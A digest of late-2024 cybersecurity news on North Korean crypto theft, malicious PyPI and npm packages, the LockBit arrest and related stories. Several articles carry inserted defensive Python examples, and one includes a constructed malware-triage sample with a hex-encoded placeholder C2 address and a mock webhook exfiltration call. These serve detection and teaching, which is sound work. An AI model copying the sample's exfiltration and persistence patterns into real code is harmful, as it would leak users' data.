State Department’s disinformation office to close after funding nixed in NDAA

The State Department’s center for fighting global disinformation received a lump of coal in its Christmas stocking this week as congressional lawmakers excluded new funding and authorization for the office beyond this year.

The Global Engagement Center, which tracks foreign disinformation, will lose its authority on Dec. 24. Despite a concerted push by State officials to lobby Congress for an extension, a measure to extend the center’s authority into 2031 was stripped out of the final version of defense authorization legislation that passed through the Senate.

“The Global Engagement Center will terminate by operation of law [by the end of the day] on December 23, 2024,” a State Department spokesperson told CyberScoop in an email. “The Department of State has consulted with Congress regarding next steps.”

According to figures provided by State, the GEC has a staff of approximately 120 and an annual budget of $61 million. The spokesperson did not address questions about what will happen to the center’s personnel and technology following the closure.

The shuttering will leave the State Department without a dedicated office for countering disinformation abroad for the first time since 2016. The closure comes at the end of a year when U.S. officials, foreign political leaders and private companies tracking disinformation have alleged that Russia and China have engaged in concerted propaganda campaigns targeting democratic elections in Taiwan, Moldova, Georgia, Romania and other countries.

“This is extremely frustrating,” Mark Montgomery, former executive director of the Cyberspace Solarium and a supporter of extending the center’s authority, told CyberScoop. “On a bipartisan basis, both political parties know that Russia, China and, to a lesser degree, Iran and other non-state actors, conduct information operations against us spreading lies, and the GEC was a good tool for ensuring that the truth, as we see it, came out.”

While the center does not focus on disinformation targeting the United States, its work with related organizations faced criticism from congressional Republicans and Elon Musk, who accused the center in 2023 of being “the worst offender in U.S. government censorship [and] media manipulation.”

Musk is now an adviser to President-elect Donald Trump and was placed in charge of an advisory board for cutting programs and reducing government spending.

Additionally, Republicans on the Hill raised questions about the GEC’s value, suggesting its work might duplicate existing analysis from the private sector and other parts of government.

In interviews with CyberScoop and FedScoop last month, GEC leaders pushed back on those views, calling their work “critical” to combating foreign propaganda campaigns in allied countries and emphasizing that they take active steps to exclude data on U.S. persons from their analysis.

“We are really the first analytical unit in the U.S. government that takes this kind of comprehensive approach of looking at threat actors — Iranians, [China], the Russians — and try to understand … what their influence is broadly on the information space in different geographic regions,” said Carrie Goux, GEC’s acting deputy coordinator.

Lindsay Gorman, a former White House official under the Biden administration, told CyberScoop that there is “a lack of recognition in Congress that the wars democracies are fighting with autocrats overseas are no longer only in the physical domain, but in the cyberspace realm of 1s and 0s.”

“Whether their goal is to marshal support for invading neighbors or undermine U.S. credibility overseas, the U.S. needs a means to fight back. One way is to expose covert campaigns for what they are — important work the GEC is doing,” said Gorman, now at the nonprofit German Marshall Fund. “GEC has been the eyes and ears on the ground when it comes to information threats overseas, tracking where autocratic strategic objectives lie and how tactics are evolving to guide responses.”

Gorman stressed that Russian and Chinese disinformation campaigns “aren’t going away” and are increasingly leveraging social media and emerging technologies like generative AI “to sow discord and undermine democracy around the world.”

GEC officials also said their limited budget has hindered efforts to acquire advanced technology needed to support their work, including tools to detect AI-manipulated media.

State Department documents obtained by FedScoop detail a range of solutions and tools the center hoped to acquire if it was reauthorized, including a system for detecting photoshopped images, a “meme detection” model to help analyze and contextualize imagery, a detector for imagery created through Stable Diffusion, and a tool to detect AI-generated assets in video.

Montgomery said that with Republicans set to take control of the State Department and both houses of Congress next month, they are positioned to shape the GEC’s mission and operations to address any concerns about impinging on domestic U.S. issues.

“The frustration is, why not give it an extension now that you’re basically responsible?” Montgomery asked. 

Written by Derek B. Johnson

Derek B. Johnson is a reporter at CyberScoop, where his beat includes cybersecurity, elections and the federal government. Prior to that, he has provided award-winning coverage of cybersecurity news across the public and private sectors for various publications since 2017. Derek has a bachelor’s degree in print journalism from Hofstra University in New York and a master’s degree in public policy from George Mason University in Virginia.



Too Much ‘Trust,’ Not Enough ‘Verify’

COMMENTARY

Despite never-ending data breaches and ransomware attacks, too many companies still rely on the outdated “trust but verify” cybersecurity strategy. This approach assumes that any user or device inside a company’s network can be trusted once it has been verified. The approach has clear weaknesses: Many businesses are putting themselves at additional risk by verifying once, then trusting forever.

There was a time when trust but verify made sense, namely when networks were self-contained and well-defined. But at some point, perhaps due to the overwhelming volume of devices on a network, the number of patches needing to be applied, user demands, and resource constraints in the cybersecurity team, things began to slip. Initial verification meant the asset was trusted, but no additional verification ever took place.

The User Example of Trust Without Ongoing Verification

It’s easy to see how this happens with users. A user typically goes through a background check when they join the company, but once onboarded, despite any number of changes in their lives that could affect their trustworthiness, we allow them to access our systems and data without further verification. 

In the majority of cases, the absence of further verification does not cause damage. However, if the user decides to act against the best interest of their employer, the results can be catastrophic. The more sensitive the information the individual has access to, the greater the risk. This is why individuals with security clearances are regularly re-vetted, and security personnel may conduct regular financial checks to identify any issues early and intervene to mitigate possible damage.

In organizations that follow a trust-but-verify approach, two personas stand out: those that have considered the risk of one-time asset verification acceptable; and — the minority — those that try to manage the risk with a re-verification program. A shift in persona from the former to the latter usually only occurs after a breach, a crisis in availability, or another “career limiting disaster.”

The reality is that there are simply not enough hours in the day for security practitioners to do all of the things that must be done. Have security patches been correctly applied to all vulnerable devices? Are all third-party security assessments properly analyzed? Do all Internet of Things (IoT) devices really belong on the network? Are managed security services performing as expected? 

An attacker who compromises one of these trusted devices inherits its trust and can move laterally across the network to reach sensitive data and critical systems. Organizations likely will not know the extent of their exposure until something goes wrong.

The Costly Consequences of Insufficient Verification

When these breaches are eventually discovered, the costs begin to mount. Companies face not only the direct costs of incident response, but potentially also regulatory fines, class-action lawsuits, lost customers, and lasting damage to their brand reputation. Relatively small incidents can cost millions of dollars, while large incidents regularly cost billions.

In addition to these direct costs, insufficient verification also leads to more frequent and expensive compliance audits. Regulators and industry bodies are increasingly demanding that companies demonstrate robust identity and access management controls, for example under the European Union’s upcoming Digital Operational Resilience Act (DORA), as well as continuous monitoring and validation of user and device activity. Certifications and accreditations can no longer be accepted at face value. 

The Path Forward: Adopt a Zero-Trust Approach

Instead of trusting after verification, businesses should instead allow only what the business needs, for as long as it needs it. Never trust, always verify. This is how a zero-trust architecture operates.

Every user, device, and application that attempts to make a connection, regardless of its location, is scrutinized and validated, dramatically limiting the potential damage from a successful compromise. Because access is brokered per request rather than granted to anything inside the perimeter, a zero-trust architecture can reduce reliance on network-perimeter firewalls and remote-access VPNs, leaving fewer devices to maintain and a smaller attack surface in which an attacker can gain a foothold.
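A small illustration of the difference between verify-once and per-request verification, written for this commentary (it is an added example, not code from the article or from any zero-trust product). The signals it checks and the thresholds it uses are assumptions chosen for the example; a real policy engine would take them from the identity provider and the endpoint-management or EDR agent.

```python
"""Per-request authorization: verify-once versus continuous verification.

Added example for this commentary, not code from the article or any vendor.
The signals (time since MFA, age of the device-posture report, time-boxed
entitlements) and the thresholds are assumptions chosen for illustration.
"""
from __future__ import annotations
from dataclasses import dataclass

# Thresholds are assumptions for the example (seconds).
MAX_MFA_AGE = {"low": 8 * 3600, "high": 15 * 60}   # re-prompt MFA sooner for sensitive data
MAX_POSTURE_AGE = 30 * 60                           # device compliance report must be this fresh


@dataclass(frozen=True)
class Session:
    user: str
    mfa_at: int            # last successful MFA (epoch seconds)
    device_id: str
    posture_ok_at: int     # last time MDM/EDR reported the device compliant


@dataclass(frozen=True)
class Request:
    session: Session
    resource: str
    sensitivity: str       # "low" or "high"
    now: int


# Constructed entitlements: (user, resource) -> expiry time. "Only what the
# business needs, for as long as it needs it" means every grant has an end.
GRANTS = {
    ("alice", "wiki"): 2_000_000_000,
    ("alice", "payroll-db"): 1_000_000 + 3600,   # one-hour grant starting at t=1_000_000
}


def authorize_verify_once(req: Request) -> bool:
    """Trust-but-verify: a session that ever completed MFA stays trusted."""
    return req.session.mfa_at <= req.now


def authorize_zero_trust(req: Request) -> tuple[bool, str]:
    """Never trust, always verify: every request re-checks identity freshness,
    device posture and a still-valid, time-boxed entitlement."""
    s = req.session
    expiry = GRANTS.get((s.user, req.resource))
    if expiry is None or req.now >= expiry:
        return False, "no current entitlement to %s" % req.resource
    if req.now - s.mfa_at > MAX_MFA_AGE[req.sensitivity]:
        return False, "MFA too old for a %s-sensitivity resource" % req.sensitivity
    if req.now - s.posture_ok_at > MAX_POSTURE_AGE:
        return False, "device posture report stale; re-check compliance"
    return True, "allow"


def demo() -> dict:
    """Run the same requests through both models (constructed scenario)."""
    now = 1_000_000
    # MFA two hours ago, posture reported one minute ago.
    alice = Session("alice", mfa_at=now - 2 * 3600, device_id="dev-1", posture_ok_at=now - 60)
    reqs = {
        "wiki": Request(alice, "wiki", "low", now),
        "payroll": Request(alice, "payroll-db", "high", now),
        "payroll_later": Request(alice, "payroll-db", "high", now + 2 * 3600),
    }
    return {k: (authorize_verify_once(r), authorize_zero_trust(r)) for k, r in reqs.items()}


if __name__ == "__main__":
    for name, (legacy, zt) in demo().items():
        print(f"{name:14} verify-once={legacy}  zero-trust={zt}")
```

The verify-once check passes every request from a session that ever authenticated. The zero-trust check allows the wiki read, denies the payroll query because the MFA is two hours old for a high-sensitivity resource, and denies the later payroll query because the one-hour grant has expired, which is what "only what the business needs, for as long as it needs it" looks like in code.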

Zero trust doesn’t mean zero testing; testing should form an integral part of any IT and cybersecurity strategy. It does mean that a major failure stemming from trust being extended to users, devices, or applications that do not deserve it becomes far less likely, because that trust is re-evaluated on every request rather than granted once.



FBI links North Korean hackers to $308 million crypto heist

The North Korean hacker group ‘TraderTraitor’ stole $308 million worth of cryptocurrency in the attack on the Japanese exchange DMM Bitcoin in May.

In a short post, the FBI attributed the attack to the state-affiliated threat actor TraderTraitor, also tracked as Jade Sleet, UNC4899, and Slow Pisces.

The crypto heist occurred in May 2024 and forced the platform to restrict account registration, cryptocurrency withdrawals, and trading until the completion of the investigations.

Earlier this week, a report from blockchain intelligence firm Chainalysis attributed the attack to North Korean threat actors but did not share any specific details.

Attack chain

In a short announcement, the FBI says that TraderTraitor’s attack on DMM Bitcoin started in late March 2024, when one of the attackers pretended to be a legitimate recruiter on LinkedIn and approached an employee of Ginco, a Japanese enterprise cryptocurrency wallet software company.

The hacker sent the Ginco employee, who had access to his employer’s wallet management system, a job proposal involving a pre-employment test on GitHub. This tactic has been popular with North Korean threat groups this year [1, 2].

The victim was sent a piece of malicious Python code to copy to their personal GitHub page in order to complete the test. The code, however, compromised the computer and allowed TraderTraitor to infiltrate Ginco and then move laterally to DMM.

“After mid-May 2024, TraderTraitor actors exploited session cookie information to impersonate the compromised employee and successfully gained access to Ginco’s unencrypted communications system,” explains the FBI.

“In late May 2024, the actors likely used this access to manipulate a legitimate transaction request by a DMM employee, resulting in the loss of 4,502.9 BTC, worth $308 million at the time of the attack,” the agency says.
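The FBI’s account turns on a stolen session cookie being replayed from the attackers’ own machine. Below is an added example (not part of the FBI notice and not Ginco’s code) of the server-side check that would surface that: it binds each session to a client fingerprint at login, rejects the cookie when it arrives from a different client, and, for detection over historical logs, flags a session ID that two distinct clients present within the same window. The log lines are constructed, and binding to IP and User-Agent is a simplification; a real deployment would prefer a device certificate or token binding over attributes an attacker can copy.

```python
"""Detecting a stolen session cookie being replayed from a second client.

Added example, not part of the FBI notice. The log format is constructed;
the binding signals (client IP and User-Agent) are a simplification.
"""
from __future__ import annotations
from dataclasses import dataclass
import hashlib


@dataclass(frozen=True)
class Req:
    ts: int            # epoch seconds
    session_id: str
    ip: str
    user_agent: str


def fingerprint(ip: str, user_agent: str) -> str:
    """Stable identifier for the client presenting the cookie."""
    return hashlib.sha256(f"{ip}|{user_agent}".encode()).hexdigest()[:16]


def detect_replay(requests: list[Req], window: int = 3600) -> list[dict]:
    """Alert when one session ID is presented from a second fingerprint while the
    first is still active (seen within `window` seconds). Sorting by time makes
    the check replayable over historical logs."""
    last_seen: dict[str, dict[str, int]] = {}
    alerts = []
    for r in sorted(requests, key=lambda r: r.ts):
        fp = fingerprint(r.ip, r.user_agent)
        seen = last_seen.setdefault(r.session_id, {})
        concurrent = [f for f, t in seen.items() if f != fp and r.ts - t <= window]
        if concurrent:
            alerts.append({"ts": r.ts, "session_id": r.session_id,
                           "new_client": fp, "existing_client": concurrent[0]})
        seen[fp] = r.ts
    return alerts


def enforce_binding(bound_fp: str, r: Req) -> bool:
    """Preventive counterpart: the server stores the fingerprint at login and
    rejects the cookie when it arrives from anyone else."""
    return fingerprint(r.ip, r.user_agent) == bound_fp


# Constructed sample: the employee's own traffic on S1, then the same cookie
# value presented from a different host and browser 50 seconds later.
SAMPLE = [
    Req(100, "S1", "203.0.113.5", "Mozilla/5.0 (Windows NT 10.0) Chrome/120"),
    Req(200, "S1", "203.0.113.5", "Mozilla/5.0 (Windows NT 10.0) Chrome/120"),
    Req(250, "S1", "198.51.100.7", "Mozilla/5.0 (X11; Linux x86_64) Firefox/121"),
    Req(300, "S2", "203.0.113.9", "Mozilla/5.0 (Macintosh) Safari/17"),
]

if __name__ == "__main__":
    for a in detect_replay(SAMPLE):
        print("possible cookie replay:", a)
```

Expect false positives from NAT and mobile roaming if you bind to the source IP alone. The stronger controls are short session lifetimes and step-up re-authentication for sensitive actions such as approving a transfer, so that a replayed cookie by itself cannot authorize the transaction.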

U.S. authorities have been monitoring the activity of TraderTraitor since 2022 when the threat actor started to target the blockchain space with fake apps.

In 2023, GitHub warned of a social engineering campaign conducted by the particular threat actors on the platform, targeting the accounts of developers in the blockchain, cryptocurrency, online gambling, and cybersecurity sectors.

Later, the FBI warned that TraderTraitor was preparing to cash out 1,580 Bitcoin (valued at the time at around $41 million) stolen from various sources that year.



Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts

Dec 24, 2024 | Ravie Lakshmanan | Malware / Data Exfiltration

Cybersecurity researchers have flagged two malicious packages that were uploaded to the Python Package Index (PyPI) repository and came fitted with capabilities to exfiltrate sensitive information from compromised hosts, according to new findings from Fortinet FortiGuard Labs.

The packages, named zebo and cometlogger, attracted 118 and 164 downloads respectively before they were taken down. According to ClickPy statistics, a majority of these downloads came from the United States, China, Russia, and India.

Zebo is a “typical example of malware, with functions designed for surveillance, data exfiltration, and unauthorized control,” security researcher Jenna Wang said, adding cometlogger “also shows signs of malicious behavior, including dynamic file manipulation, webhook injection, stealing information, and anti-[virtual machine] checks.”

The first of the two packages, zebo, uses obfuscation techniques, such as hex-encoded strings, to conceal the URL of the command-and-control (C2) server it communicates with over HTTP requests.

It also packs in a slew of data-harvesting features, including use of the pynput library to capture keystrokes and ImageGrab to take a screenshot every hour, saving them to a local folder before uploading them to the free image hosting service ImgBB with an API key retrieved from the C2 server.

In addition to exfiltrating sensitive data, the malware sets up persistence on the machine by creating a batch script that launches the Python code and adds it to the Windows Startup folder so that it’s automatically executed upon every reboot.

Cometlogger, on the other hand, is far more feature-packed, siphoning a wide range of information, including cookies, passwords, tokens, and account-related data from apps such as Discord, Steam, Instagram, X, TikTok, Reddit, Twitch, Spotify, and Roblox.

It’s also capable of harvesting system metadata, network and Wi-Fi information, a list of running processes, and clipboard content. Furthermore, it incorporates checks to avoid running in virtualized environments and terminates web browser-related processes to ensure unrestricted file access.

“By asynchronously executing tasks, the script maximizes efficiency, stealing large amounts of data in a short time,” Wang said.

“While some features could be part of a legitimate tool, the lack of transparency and suspicious functionality make it unsafe to execute. Always scrutinize code before running it and avoid interacting with scripts from unverified sources.”
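A static triage pass for the indicators Fortinet describes, added here as an example (it is not Fortinet’s tooling and not the zebo or cometlogger code): it parses a module with Python’s `ast` and reports keylogging and screenshot imports, runtime hex decoding and long hex literals, a Windows Startup-folder path, and a webhook-style URL. The two source snippets it is run against are constructed for the illustration; the hex literal decodes to a placeholder example.com URL.

```python
"""Static triage of a Python module for the indicators described above.

Added example for this article, not Fortinet's tooling or the malware itself.
The two snippets scanned below are constructed; the webhook and C2 strings
are placeholders on example.com, not real infrastructure.
"""
from __future__ import annotations
import ast
import re

HEX_RUN = re.compile(r"^[0-9a-fA-F]{32,}$")    # long hex literal, often an encoded URL/config
STARTUP_MARKER = "Programs\\Startup"           # Windows per-user Startup folder (persistence)
WEBHOOK_MARKER = "/api/webhooks/"              # webhook-style endpoint (exfiltration)
WATCHED_MODULES = {
    "pynput": "keystroke capture (pynput)",
    "PIL.ImageGrab": "screen capture (PIL.ImageGrab)",
}


def imported_names(tree: ast.AST) -> set[str]:
    """Collect dotted module names from both `import x.y` and `from x import y`."""
    names: set[str] = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names.update(alias.name for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            names.add(node.module)
            names.update(f"{node.module}.{alias.name}" for alias in node.names)
    return names


def scan_source(src: str) -> list[str]:
    """Return distinct, sorted indicator tags found in one module's source."""
    tree = ast.parse(src)
    tags: set[str] = set()
    mods = imported_names(tree)
    for mod, tag in WATCHED_MODULES.items():
        if any(m == mod or m.startswith(mod + ".") for m in mods):
            tags.add(tag)
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            f = node.func
            if isinstance(f, ast.Attribute) and f.attr == "fromhex":
                tags.add("runtime hex decoding (bytes.fromhex)")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            s = node.value
            if HEX_RUN.match(s):
                tags.add("long hex literal")
            if STARTUP_MARKER in s:
                tags.add("Startup-folder path (persistence)")
            if WEBHOOK_MARKER in s:
                tags.add("webhook URL (exfiltration)")
    return sorted(tags)


# Constructed sample resembling the behaviours reported above. The hex
# string decodes to "http://example.com/c2" (a placeholder, not a real C2).
SUSPECT = r'''
import os
import requests
from pynput import keyboard
from PIL import ImageGrab

C2 = bytes.fromhex("687474703a2f2f6578616d706c652e636f6d2f6332").decode()
STARTUP = os.path.expandvars(r"%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup")

def exfil(data):
    requests.post("https://example.com/api/webhooks/0/placeholder", json={"content": data})
'''

# Constructed benign module for comparison.
BENIGN = '''
import requests

def fetch(url):
    return requests.get(url, timeout=5).status_code
'''

if __name__ == "__main__":
    print("suspect:", scan_source(SUSPECT))
    print("benign: ", scan_source(BENIGN))
```

Each tag is a triage signal rather than a verdict: `bytes.fromhex` and long hex literals are common in legitimate cryptographic code, and `pynput` has honest uses. The combination found in the constructed sample, a decoded C2 address plus keylogging plus Startup-folder persistence plus an exfiltration endpoint, is what merits reading the code before `pip install`.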



The global firmware threat nobody’s tracking • The Register

Opinion: One of the charms of coding is that malice can be indistinguishable from incompetence. Last week’s Who, Me? story about financial transfer test software running amok is a case in point.

The hapless dev left code running overnight that should have moved a single cent in and out of his test account. Instead, it machine-gunned $100 transfers in for hours. It tripped internal security but the temporarily rich kid had told his boss about it and could thus talk his way clear.

What if the bank-raiding routine hadn’t been detected? Our hero would have come in to find a huge cash stash sitting there, a highly tempting proof of concept perhaps. Not coming clean would be malicious, but the code’s the same whether he ‘fessed up or not.

This is exactly the quandary US authorities are pondering as they consider banning products by Chinese consumer networking company TP-Link. These are very popular because the hardware is good and reliable, but mostly because they are remarkably cheap. So cheap, in fact, that the company is suspected of dumping, selling below cost to take market share. The main reason for suspicion, though, is the routers’ firmware. It’s outstandingly prone to vulnerabilities, ridden with things like buffer overflows, to the point that mere incompetence seems an insufficient explanation.

This sounds like a conspiracy theory because the evidence is ambiguous. Line up the circumstantial evidence and it’s at least plausible. If TP-Link does have a corporate fondness for crap coders, how come the features visible to owners in everyday use work well, while invisible vulnerabilities are so common? Chinese law compels all domestic companies to cooperate with state security in secret. There is already evidence of widespread Chinese infiltration of communication infrastructure with Salt Typhoon. Motive, opportunity, ability, and history: where does the balance of probabilities lie?

It would be possible to prove TP-Link products were uniquely vulnerable by statistical analysis, comparing them to competitive products from other vendors. At that point, it doesn’t really matter what the reason is, they could be taken off the market because of consumer safety worries. That wouldn’t do much good, given the huge installed base, and the uniquely attractive environment infrastructure offers to the bad guys. It’s invisible to end users, hard to monitor, hard to update, and once something’s installed and working, it is highly disruptive to rip it out.

A great/awful example of this is the recently disclosed Iranian-linked attack on US and Israeli energy and IoT devices, part of a family of attacks that have targeted a wide range of devices from a wide range of manufacturers. Whoever created the IOCONTROL malware is highly competent and inventive, but at first glance it seems unlikely that the firmware of the target devices would contain deliberately vulnerable Iranian-sourced code. Iran has no international IT infrastructure makers to manipulate, being locked away behind sanctions. This need not stop it. Nor anyone else.

Industrial espionage is exceptionally hard to spot until the stolen secrets come to light, and industrial sabotage can be equally hard to trace. When that industry is firmware, and the malicious actor has no intention of using the information in detectable ways, this is even more so. Given how valuable zero days are to attackers, how much easier would they be to exploit if you put them there yourself?

You don’t even need to embed a star player in your target company, just someone competent enough to send copies of the code under development back to the malware creators, and get their changes back into the tree.

Do all those IoT, industrial control, and router companies have the ability to spot highly disguised vulnerabilities slipped in by malicious experts? They’re not very good at spotting incompetent errors, given the many alerts the industry generates.

Catching corrupt coders is always going to be hard, unless their own opsec is bad. It’s also most embarrassing to go public when you do. Even in security services and the military, where employees are routinely screened and counter-espionage is a specialty, the job is still very difficult. It’s not as if ideology or animus are needed to tempt someone into sin: cash and flattery do the job just as well.

It’s not a case of whether this is happening. The opportunities are too great, the risk too small, and the outlays too modest to resist. The question is how to find it, given that nobody seems to be looking. A company responsible for a vulnerability has the responsibility to fix it, but not to track down how it came to be and who was involved. There is no agency tracking and correlating this information, not unless national security is directly involved.

This just in: it is. We just don’t really believe it. Until we do, there’s an entire industry-wide meta-vulnerability going completely unchecked. Better believe it.



Chinese cyber center points finger at U.S. over alleged cyberattacks to steal trade secrets

China’s national cyber incident response center accused the U.S. government of launching cyberattacks against two Chinese tech companies in a bid to steal trade secrets.

In a notice Wednesday, the National Computer Network Emergency Response Technical Team/Coordination Center of China (CNCERT) said a suspected U.S. intelligence agency was behind the attacks, and that CNCERT had “handled” them, according to a Google translation.

The U.S. government has long accused China of cyber espionage to steal trade secrets from domestic companies, and China’s allegations about U.S. cyberattacks arrive in the midst of a very public campaign from U.S. government officials blaming China for a major attack on telecommunications carriers.

CNCERT said one of the attacks dates back to August of this year, against “a certain advanced material design and research unit.” The suspected attackers exploited a vulnerability in a document management system to infiltrate the software upgrade management server the company used, then installed Trojans on more than 270 of the company’s hosts, CNCERT said.

The other attack dates to May of last year, against a “large-scale high-tech enterprise” in China’s “smart energy and digital information industry,” according to CNCERT. The center’s analysis determined that the attackers exploited Microsoft Exchange vulnerabilities to get into the company’s mail server, then implanted backdoors and took control of devices at the company and its subsidiaries.

China has, in recent years, stepped up its charges about U.S. cyberattacks. The report did not name a specific U.S. government office or entity responsible for the attacks.

The Chinese Communist Party-owned newspaper China Daily published an infographic this year detailing allegations that the United States is the leading source of cyberattacks against China over the past five years, citing CNCERT in part.

Republican lawmakers, as well as a top official in the incoming second Trump administration, have said recently in response to the Salt Typhoon telecommunications breaches that the United States has been too timid about going on offense against China.

CNCERT describes itself as a non-governmental non-profit cybersecurity technical center. China Daily said it is led by the Ministry of Industry and Information Technology.

Spokespeople for the National Security Agency and U.S. Cyber Command did not immediately respond to requests for comment Thursday.

Written by Tim Starks

Tim Starks is senior reporter at CyberScoop. His previous stops include working at The Washington Post, POLITICO and Congressional Quarterly. An Evansville, Ind. native, he’s covered cybersecurity since 2003. Email Tim here: tim.starks@cyberscoop.com.


LockBit Ransomware Developer Arrested in Israel

NEWS BRIEF

A newly unsealed criminal complaint by US law enforcement shows they have been working to dismantle the LockBit ransomware-as-a-service group for several years, including a previously undisclosed arrest of one of the operation’s lead developers in Israel last August.

Rostislav Panev, a 51-year-old dual Russian-Israeli citizen, is awaiting extradition to the US, where he faces charges alongside two others accused of similarly working for LockBit, developing not just the ransomware itself but also tools used by affiliates. For his part, Panev is accused of working on LockBit ransomware from its beginnings in 2019, eventually helping create one of the most prolific ransomware operations in the world, according to the Justice Department’s statement about the arrest.

Panev, according to the Justice Department, at the time of his arrest had admin credentials for LockBit’s Dark Web online repository with the ransomware’s source code, as well as the source code for an affiliate tool called “StealBit” used to exfiltrate stolen data. His laptop also held the access credentials for the LockBit control panel used by affiliates. The Justice Department’s statement adds that Panev confessed to his role in the LockBit ransomware operation.

“The Justice Department’s work going after the world’s most dangerous ransomware schemes includes not only dismantling networks, but also finding and bringing to justice the individuals responsible for building and running them,” Attorney General Merrick Garland said in a statement about the arrests. “Three of the individuals who we allege are responsible for LockBit’s cyberattacks against thousands of victims are now in custody, and we will continue to work alongside our partners to hold accountable all those who lead and enable ransomware attacks.”



Malicious Rspack, Vant packages published using stolen NPM tokens

Three popular npm packages, @rspack/core, @rspack/cli, and Vant, were compromised through stolen npm account tokens, allowing threat actors to publish malicious versions that installed cryptominers.

The supply chain attack, spotted by both Sonatype and Socket researchers, deployed the XMRig miner on compromised systems to mine Monero, a privacy-focused cryptocurrency whose transactions are hard to trace.

Additionally, Sonatype discovered that all three npm packages fell victim to the identical compromise on the same day, affecting multiple versions.

Rspack is a high-performance JavaScript bundler written in Rust, used in building and bundling JavaScript projects.

The two packages that were compromised are its core component and the command line interface (CLI) tool, downloaded 394,000 and 145,000 times weekly, respectively, on npm.

Vant is a lightweight, customizable Vue.js UI library tailored for building mobile web applications, providing pre-designed, reusable UI components. It is also relatively popular, garnering 46,000 weekly downloads on npm.

Cryptomining activity

The malicious code is hidden inside the ‘support.js’ file on @rspack/core, and in the ‘config.js’ file in ‘@rspack/cli,’ and fetches its configuration and command-and-control (C2) instructions from an external server.

The malware leverages npm’s postinstall script to execute automatically upon package installation.

Fetching the miner from an external address (Source: Sonatype)

Once it’s running, it retrieves the geographic location and network details of the victim’s system.

“This call accesses the geolocation API at http://ipinfo.io/json, potentially gathering IP addresses, geographic location, and other network details about the victim’s system,” explains Socket.

“Such reconnaissance is often used to tailor attacks based on the user’s location or network profile.”

The XMRig binary is downloaded from a GitHub repository, and for the compromised Vant package, it is renamed to ‘/tmp/vant_helper’ to conceal its purpose and blend into the filesystem.

The miner is launched with execution parameters that cap CPU usage at 75% of the available processor threads, a setting that trades some mining throughput for a lower chance of the load being noticed.

Sonatype’s Ax Sharma says that the following Monero address was found in the compromised Rspack packages:


475NBZygwEajj4YP2Bdu7yg6XnaphiFjxTFPkvzg5xAjLGPSakE68nyGavn8r1BYqB44xTEyKQhueeqAyGy8RaYc73URL1j

Response to compromise

Both Rspack and Vant confirmed that their NPM accounts were compromised, releasing new, cleaned versions of their packages and apologizing to the community for failing to safeguard the supply chain.

“On 12/19/2024, 02:01 (UTC), we discovered that our npm packages @rspack/core and @rspack/cli were maliciously attacked. The attacker released v1.1.7 using a compromised npm token, which contained malicious code. We took immediate action upon discovering the issue,” explained the Rspack developers.

“This release is to fix a security issue. We found that one of our team members’ npm token was stolen and used to release multiple versions with security vulnerabilities. We have taken measures to fix it and re-released the latest version,” posted the Vant developer.

The compromised Rspack version to avoid is 1.1.7, which contains the malicious crypto mining code.

Users are recommended to upgrade to v1.1.8 or later. The version before the malicious one, v1.1.6, is also safe, but the latest has implemented additional security measures.

Regarding Vant, multiple compromised versions should be avoided. These are: 2.13.3, 2.13.4, 2.13.5, 3.6.13, 3.6.14, 3.6.15, 4.9.11, 4.9.12, 4.9.13, and 4.9.14.

Users are recommended to upgrade to Vant v4.9.15 and newer, which is a safe re-release of the latest version of the software.
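A lockfile audit for the affected versions, added as an example (not tooling from the Rspack or Vant projects, Sonatype or Socket): it reads a `package-lock.json`, reports any installed package whose version is in the lists above, including nested copies under another dependency’s `node_modules`, and separately lists packages that the lockfile flags with `hasInstallScript`, since the `postinstall` hook is how the miner was launched. The lock file below is constructed.

```python
"""Audit a package-lock.json for the compromised Rspack/Vant releases and for
packages that run install-time scripts.

Added example, not tooling from Rspack, Vant, Sonatype or Socket. The lock
file below is constructed; the version list is the one reported above.
"""
from __future__ import annotations
import json

# Versions named in the maintainers' advisories quoted above.
COMPROMISED = {
    "@rspack/core": {"1.1.7"},
    "@rspack/cli": {"1.1.7"},
    "vant": {"2.13.3", "2.13.4", "2.13.5", "3.6.13", "3.6.14", "3.6.15",
             "4.9.11", "4.9.12", "4.9.13", "4.9.14"},
}


def package_name(lock_path: str) -> str:
    """'node_modules/a/node_modules/@scope/b' -> '@scope/b' (nested installs included)."""
    return lock_path.rsplit("node_modules/", 1)[-1]


def audit_lockfile(lock: dict) -> dict:
    """lockfileVersion 2/3 lists every installed package under "packages";
    npm sets "hasInstallScript" on entries that declare install-time scripts."""
    hits, scripted = [], []
    for path, meta in lock.get("packages", {}).items():
        if not path:               # "" is the root project itself
            continue
        name, version = package_name(path), meta.get("version", "")
        if version in COMPROMISED.get(name, set()):
            hits.append((name, version))
        if meta.get("hasInstallScript"):
            scripted.append(name)
    return {"compromised": sorted(hits), "install_scripts": sorted(set(scripted))}


# Constructed lock file: one bad @rspack/core, a clean @rspack/cli and vant,
# and a second, older vant nested under another dependency.
SAMPLE_LOCK = json.loads('''{
  "name": "demo-app", "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app", "version": "0.1.0"},
    "node_modules/@rspack/core": {"version": "1.1.7", "hasInstallScript": true},
    "node_modules/@rspack/cli": {"version": "1.1.8"},
    "node_modules/vant": {"version": "4.9.15"},
    "node_modules/some-dep/node_modules/vant": {"version": "3.6.14"}
  }
}''')

if __name__ == "__main__":
    print(json.dumps(audit_lockfile(SAMPLE_LOCK), indent=2))
```

Running `npm ci --ignore-scripts` (or setting `npm config set ignore-scripts true`) would have stopped the postinstall hook from executing at all, at the cost of breaking packages that legitimately build native code at install time; an audit like this one tells you which packages those are before you turn that setting on.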

This incident follows other recent supply chain compromises, like those on LottieFiles, which targeted people’s cryptocurrency assets, and Ultralytics, which hijacked users’ hardware resources for cryptomining.



Lazarus Group Spotted Targeting Nuclear Engineers with CookiePlus Malware

The Lazarus Group, an infamous threat actor linked to the Democratic People’s Republic of Korea (DPRK), has been observed leveraging a “complex infection chain” targeting at least two employees belonging to an unnamed nuclear-related organization within the span of one month in January 2024.

The attacks, which culminated in the deployment of a new modular backdoor referred to as CookiePlus, are part of a long-running cyber espionage campaign known as Operation Dream Job, which is also tracked as NukeSped by cybersecurity company Kaspersky. It’s known to be active since at least 2020, when it was exposed by ClearSky.

